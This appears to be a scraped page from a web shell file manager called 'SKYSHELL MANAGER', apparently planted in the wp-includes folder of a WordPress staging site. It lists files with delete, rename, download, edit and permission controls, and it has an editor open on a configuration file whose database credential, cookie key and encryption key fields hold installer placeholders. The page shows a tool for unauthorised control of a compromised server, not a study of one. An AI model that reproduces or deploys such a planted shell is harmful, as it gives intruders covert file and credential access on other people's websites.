📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: settings.inc.php
<?php define('_DB_SERVER_', '[[softdbhost]]'); define('_DB_NAME_', '[[softdb]]'); define('_DB_USER_', '[[softdbuser]]'); define('_DB_PASSWD_', '[[softdbpass]]'); define('_DB_PREFIX_', '[[dbprefix]]'); define('_MYSQL_ENGINE_', 'InnoDB'); define('_PS_CACHING_SYSTEM_', 'CacheMemcache'); define('_COOKIE_KEY_', '[[cookie_key]]'); define('_COOKIE_IV_', '[[cookie_iv]]'); define('_PS_CREATION_DATE_', '[[creation]]'); define('_TB_VERSION_', '1.6.0'); define('_TB_REVISION_', '1.6.0'); define('_TB_BUILD_PHP_', '7.4'); define('_PS_VERSION_', '1.6.1.999'); define('_PHP_ENCRYPTION_KEY_', '[[_PHP_ENCRYPTION_KEY_]]');
Save